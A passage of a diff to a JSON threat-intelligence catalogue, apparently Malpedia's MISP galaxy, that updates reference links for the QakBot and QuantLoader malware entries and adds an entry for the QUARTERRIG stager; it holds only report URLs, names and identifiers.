"https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://news.sophos.com/en-us/2022/03/10/qakbot-injects-itself-into-the-middle-of-your-conversations/", - "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf", - "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html", - "https://www.group-ib.com/blog/egregor", - "https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html", - "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", - "https://blog.cyble.com/2023/02/17/the-many-faces-of-qakbot-malware-a-look-at-its-diverse-distribution-methods/", - "https://www.netresec.com/?page=Blog&month=2023-03&post=QakBot-C2-Traffic", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", - "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", - "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf", - "https://www.securityhomework.net/articles/qakbot_ccs_prioritization_and_new_record_types/qakbot_ccs_prioritization_and_new_record_types.php", - "https://securelist.com/qakbot-technical-analysis/103931/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/", - "https://www.socinvestigation.com/qbot-spreads-via-lnk-files-detection-response/", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - 
"https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/", - "https://www.youtube.com/watch?v=4I0LF8Vm7SI", - "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "https://www.malwarology.com/posts/4-qakbot-api-hashing/", - "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks", + "https://experience.mandiant.com/trending-evil/p/1", "https://www.circl.lu/pub/tr-64/", - "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", - "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/", - "https://www.group-ib.com/blog/prolock_evolution", - "https://experience.mandiant.com/trending-evil-2/p/1", - "https://hatching.io/blog/reversing-qakbot", - "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf", - "https://blog.quosec.net/posts/grap_qakbot_navigation/", - "https://sublime.security/blog/detecting-qakbot-wsf-attachments-onenote-files-and-generic-attack-surface-reduction", - "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", - "https://blog.quosec.net/posts/grap_qakbot_strings/", - "https://news.sophos.com/en-us/2023/02/06/qakbot-onenote-attacks/", - "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern", - 
"https://www.um.edu.mt/library/oar/handle/123456789/76802", - "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", - "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", - "https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7", - "https://micahbabinski.medium.com/html-smuggling-detection-5adefebb6841", - "https://www.intrinsec.com/egregor-prolock/", - "https://www.linkedin.com/posts/zayedaljaberi_hunting-recent-qakbot-malware-activity-6903498764984606720-2Gl4", - "https://twitter.com/redcanary/status/1334224861628039169", - "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", - "https://seguranca-informatica.pt/a-taste-of-the-latest-release-of-qakbot", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", - "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns", - "https://threatresearch.ext.hp.com/detecting-ta551-domains/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", - "https://www.malwarology.com/posts/3-qakbot-process-injection/", - "https://www.zscaler.com/blogs/security-research/ares-banking-trojan-learns-old-tricks-adds-defunct-qakbot-dga", - "https://blog.vincss.net/2021/03/re021-qakbot-dangerous-malware-has-been-around-for-more-than-a-decade.html", - "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf", - "https://twitter.com/ChouchWard/status/1405168040254316547", - "https://www.techtimes.com/articles/274190/20220412/qbot-botnet-deploys-malware-payloads-through-malicious-windows-installers.htm", - "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/", - "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - 
"https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf", + "https://medium.com/walmartglobaltech/qbot-testing-malvertising-campaigns-3e2552cbc69a", + "https://hatching.io/blog/reversing-qakbot", + "https://www.securityhomework.net/articles/qakbot_ccs_prioritization_and_new_record_types/qakbot_ccs_prioritization_and_new_record_types.php", + "https://www.elastic.co/de/security-labs/qbot-malware-analysis", + "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", + "https://www.malwarology.com/2022/04/qakbot-series-api-hashing/", + "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", + "https://quosecgmbh.github.io/blog/grap_qakbot_navigation.html", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + "https://www.malwarology.com/posts/2-qakbot-conf-extraction/", + "https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/", + "https://socprime.com/blog/qbot-malware-detection-old-dog-new-tricks/", + "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://bin.re/blog/the-dga-of-qakbot/", + "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", + "https://madlabs.dsu.edu/madrid/blog/2021/04/30/qbot-analyzing-php-proxy-scripts-from-compromised-web-server/", + "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html", + 
"https://blog.group-ib.com/prometheus-tds", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://seguranca-informatica.pt/a-taste-of-the-latest-release-of-qakbot", + "https://www.secureworks.com/blog/law-enforcement-takes-down-qakbot", + "https://www.team-cymru.com/post/visualizing-qakbot-infrastructure", + "https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", + "https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot", + "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", + "https://www.spamhaus.org/news/article/819/qakbot-the-takedown-and-the-remediation", + "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", + "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta", + "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://twitter.com/TheDFIRReport/status/1361331598344478727", + "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns", + "https://web.archive.org/web/20151026140427/https://www.symantec.com/security_response/writeup.jsp?docid=2009-050707-0639-99", "https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta", - "https://malwareandstuff.com/upnp-messing-up-security-since-years/", - "https://asec.ahnlab.com/en/44662/", - "https://www.bleepingcomputer.com/news/security/fujifilm-shuts-down-network-after-suspected-ransomware-attack/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://lab52.io/blog/bypassing-qakbot-anti-analysis-tactics/", - 
"https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer", - "https://isc.sans.edu/diary/rss/26862", - "https://www.rapid7.com/blog/post/2023/04/18/automating-qakbot-detection-at-scale-with/", - "https://blog.eclecticiq.com/qakbot-malware-used-unpatched-vulnerability-to-bypass-windows-os-security-feature", - "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", - "https://www.fortinet.com/blog/threat-research/new-variant-of-qakbot-spread-by-phishing-emails", - "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.bitsight.com/blog/emotet-botnet-rises-again", + "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/", + "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", "https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://web.archive.org/web/20110909041410/http://www.symantec.com/connect/blogs/qakbot-data-thief-unmasked-part-i", + "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://blog.lumen.com/qakbot-retool-reinfect-recycle/", + "https://www.elastic.co/security-labs/qbot-configuration-extractor", + "https://experience.mandiant.com/trending-evil-2/p/1", + "https://unit42.paloaltonetworks.com/tutorial-qakbot-infection/", + "https://www.youtube.com/watch?v=OCRyEUhiEyw", + "https://www.malwarology.com/posts/4-qakbot-api-hashing/", + 
"https://redcanary.com/blog/intelligence-insights-december-2021", + "https://docs.velociraptor.app/blog/2023/2023-04-05-qakbot/", + "https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html", + "https://www.group-ib.com/blog/egregor", + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://www.malwarology.com/2022/04/qakbot-series-configuration-extraction/", + "https://blog.vincss.net/2021/03/re021-qakbot-dangerous-malware-has-been-around-for-more-than-a-decade.html", + "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/", + "https://twitter.com/Corvid_Cyber/status/1455844008081641472", + "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service", + "https://isc.sans.edu/diary/rss/28728", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://perception-point.io/insights-into-an-excel-4-0-macro-attack-using-qakbot-malware", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", + "https://news.sophos.com/en-us/2022/03/10/qakbot-injects-itself-into-the-middle-of-your-conversations/", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", + "https://www.trellix.com/en-us/about/newsroom/stories/research/qakbot-evolves-to-onenote-malware-distribution.html", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://www.malwarology.com/posts/3-qakbot-process-injection/", + "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot", + 
"https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise", + "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", + "https://www.team-cymru.com/post/visualizing-qakbot-infrastructure-part-ii-uncharted-territory", + "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", + "https://research.loginsoft.com/threat-research/blog-maximizing-threat-detections-of-qakbot-with-osquery/", + "https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html", + "https://www.um.edu.mt/library/oar/handle/123456789/76802", + "http://blog.opensecurityresearch.com/2011/12/intro-to-reversing-w32pinkslipbot.html", + "https://www.youtube.com/watch?v=iB1psRMtlqg", + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://drive.google.com/file/d/1mO2Zb-Q94t39DvdASd4KNTPBD8JdkyC3/view", + "https://www.bleepingcomputer.com/news/security/qbot-phishing-uses-windows-calculator-sideloading-to-infect-devices/", + "https://twitter.com/kienbigmummy/status/1460537501676802051", + "https://www.malwarology.com/2022/04/qakbot-series-string-obfuscation/", + "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", + 
"https://isc.sans.edu/forums/diary/XLSB+Files+Because+Binary+is+Stealthier+Than+XML/28476/", + "https://lab52.io/blog/bypassing-qakbot-anti-analysis-tactics/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/", + "https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html", + "https://raw.githubusercontent.com/NtQuerySystemInformation/Malware-RE-papers/main/Qakbot%20report.pdf", + "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html", + "https://twitter.com/embee_research/status/1592067841154756610?s=20&t=hEALPAWr1LIt9pXcVpxjRQ", + "https://www.malwarology.com/posts/1-qakbot-strings-obfuscation/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/decrypting-qakbots-encrypted-registry-keys/", + "https://malwareandstuff.com/upnp-messing-up-security-since-years/", + "https://threatresearch.ext.hp.com/detecting-ta551-domains/", + "https://www.justice.gov/d9/2023-08/23mj4251_application_redacted.pdf", + "https://web.archive.org/web/20130530033754/http://www.symantec.com/connect/blogs/qakbot-steals-2gb-confidential-data-week", + "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/", + "https://securelist.com/qakbot-technical-analysis/103931/", + "https://blog.minerva-labs.com/a-new-datoploader-delivers-qakbot-trojan", + "https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques", + "https://www.bleepingcomputer.com/news/security/qbot-needs-only-30-minutes-to-steal-your-credentials-emails/", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", + 
"https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
+ "https://sansorg.egnyte.com/dl/ALlvwK6fp0",
+ "https://asec.ahnlab.com/en/44662/",
+ "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917",
+ "https://www.bleepingcomputer.com/news/security/qbot-malware-switches-to-new-windows-installer-infection-vector/",
+ "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/",
+ "https://blog.quosec.net/posts/grap_qakbot_navigation/",
+ "https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7",
+ "https://github.com/prodaft/malware-ioc/blob/master/PTI-66/DarkGate.md",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
+ "https://www.atomicmatryoshka.com/post/malware-headliners-qakbot",
+ "https://www.zscaler.com/blogs/security-research/ares-banking-trojan-learns-old-tricks-adds-defunct-qakbot-dga",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
+ "https://twitter.com/Unit42_Intel/status/1461004489234829320",
+ "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/",
+ "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike",
+ "https://www.techtimes.com/articles/274190/20220412/qbot-botnet-deploys-malware-payloads-through-malicious-windows-installers.htm",
+ "https://www.dsih.fr/article/5020/comment-qbot-revient-en-force-avec-onenote.html",
+ "https://www.trendmicro.com/en_us/research/21/k/qakbot-loader-returns-with-new-techniques-and-tools.html",
+ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/qakbot-browser-hooking-p1/",
+ "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
+ "https://isc.sans.edu/diary/rss/26862",
+ "https://krebsonsecurity.com/2023/08/u-s-hacks-qakbot-quietly-removes-botnet-infections/",
+ "https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies",
+ "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/",
+ "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis",
+ "https://www.tidalcyber.com/blog/identifying-and-defending-against-qakbots-evolving-ttps",
+ "https://www.youtube.com/watch?v=4I0LF8Vm7SI",
+ "https://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern",
+ "https://news.sophos.com/en-us/2023/02/06/qakbot-onenote-attacks/",
+ "https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer",
+ "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/",
+ "https://twitter.com/ChouchWard/status/1405168040254316547",
+ "https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/",
+ "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf",
+ "https://embee-research.ghost.io/shodan-censys-queries/",
+ "https://blog.quosec.net/posts/grap_qakbot_strings/",
+ "https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/",
+ "https://www.f5.com/labs/articles/threat-intelligence/qbot-banking-trojan-still-up-to-its-old-tricks",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/",
+ "https://www.socinvestigation.com/qbot-spreads-via-lnk-files-detection-response/",
+ "https://www.zscaler.com/blogs/security-research/hibernating-qakbot-comprehensive-study-and-depth-campaign-analysis",
+ "https://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html",
+ "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/",
+ "https://syrion.me/malware/qakbot-bb-extractor/",
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
+ "https://www.group-ib.com/blog/prolock_evolution",
+ "https://quosecgmbh.github.io/blog/grap_qakbot_strings.html",
+ "https://web.archive.org/web/20110406012907/http://www.symantec.com/connect/blogs/qakbot-data-thief-unmasked-part-ii",
+ "https://www.rapid7.com/blog/post/2023/04/18/automating-qakbot-detection-at-scale-with/",
+ "https://d01a.github.io/pikabot/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.fortinet.com/blog/threat-research/new-variant-of-qakbot-spread-by-phishing-emails",
+ "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html",
+ "https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources",
+ "https://www.malwarology.com/2022/04/qakbot-series-process-injection/",
+ "https://blog.talosintelligence.com/following-the-lnk-metadata-trail",
+ "https://twitter.com/_alex_il_/status/1384094623270727685",
+ "https://blog.eclecticiq.com/qakbot-malware-used-unpatched-vulnerability-to-bypass-windows-os-security-feature",
+ "https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html",
+ "https://twitter.com/elisalem9/status/1381859965875462144",
+ "https://www.intrinsec.com/egregor-prolock/",
+ "https://micahbabinski.medium.com/html-smuggling-detection-5adefebb6841",
+ "https://github.com/0xThiebaut/PCAPeek/",
+ "https://web.archive.org/web/20120206174705/http://blogs.rsa.com/rsafarl/businesses-beware-qakbot-spreads-like-a-worm-stings-like-a-trojan/",
+ "https://www.justice.gov/usao-cdca/pr/qakbot-malware-disrupted-international-cyber-takedown",
+ "https://www.netresec.com/?page=Blog&month=2023-03&post=QakBot-C2-Traffic",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
 "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/",
- "https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs"
+ "https://twitter.com/tylabs/status/1462195377277476871",
+ "https://www.youtube.com/watch?v=M22c1JgpG-U",
+ "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/",
+ "https://www.shadowserver.org/news/qakbot-botnet-disruption/",
+ "https://www.bleepingcomputer.com/news/security/fujifilm-shuts-down-network-after-suspected-ransomware-attack/",
+ "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/demystifying-qbot-malware.html",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://github.com/binref/refinery/blob/master/tutorials/tbr-files.v0x06.Qakbot.Decoder.ipynb",
+ "https://documents.trendmicro.com/assets/pdf/Technical-Brief---The-Prelude-to-Ransomware-A-Look-into-Current-QAKBOT-Capabilities-and-Activity.pdf",
+ "https://isc.sans.edu/diary/rss/28568",
+ "https://isc.sans.edu/diary/rss/28448",
+ "https://twitter.com/embee_research/status/1592067841154756610?s=20",
+ "http://contagiodump.blogspot.com/2010/11/template.html",
+ "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf",
+ "https://www.elastic.co/security-labs/qbot-malware-analysis",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
+ "https://sublime.security/blog/detecting-qakbot-wsf-attachments-onenote-files-and-generic-attack-surface-reduction",
+ "https://www.linkedin.com/posts/zayedaljaberi_hunting-recent-qakbot-malware-activity-6903498764984606720-2Gl4",
+ "https://blog.reversinglabs.com/blog/spotting-malicious-excel4-macros",
+ "https://www.secureworks.com/research/threat-profiles/gold-lagoon",
+ "https://www.splunk.com/en_us/blog/security/from-macros-to-no-macros-continuous-malware-improvements-by-qakbot.html",
+ "https://www.justice.gov/d9/2023-08/23mj4244_application_redacted.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
+ "https://redcanary.com/blog/intelligence-insights-november-2021/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
+ "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/",
+ "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html",
+ "https://twitter.com/redcanary/status/1334224861628039169",
+ "https://blog.cyble.com/2023/02/17/the-many-faces-of-qakbot-malware-a-look-at-its-diverse-distribution-methods/",
+ "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/",
+ "https://www.youtube.com/watch?v=gk7fCC5RiAQ",
+ "https://www.fbi.gov/news/stories/fbi-partners-dismantle-qakbot-infrastructure-in-multinational-cyber-takedown",
+ "https://www.reliaquest.com/blog/qbot-black-basta-ransomware/",
+ "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf"
 ],
 "synonyms": [
 "Oakboat",
@@ -39621,15 +41473,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.quantloader",
- "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat",
- "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/",
- "https://twitter.com/Arkbird_SOLG/status/1458973883068043264",
- "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/",
 "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://intel471.com/blog/a-brief-history-of-ta505",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://twitter.com/Arkbird_SOLG/status/1458973883068043264",
+ "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf"
+ "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat",
+ "https://intel471.com/blog/a-brief-history-of-ta505"
 ],
 "synonyms": [],
 "type": []
@@ -39637,85 +41489,103 @@
 "uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549",
 "value": "QuantLoader"
 },
+ {
+ "description": "A stager used by APT29 to download and run CobaltStrike.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quarterrig",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf",
+ "https://www.gov.pl/attachment/6f51bb1a-3ad2-461c-a16d-408915a56f77"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ef29604c-1fc8-4f3f-9342-dbb28bb1bd5b",
+ "value": "QUARTERRIG"
+ },
 {
 "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.",
 "meta": {
 "refs": [
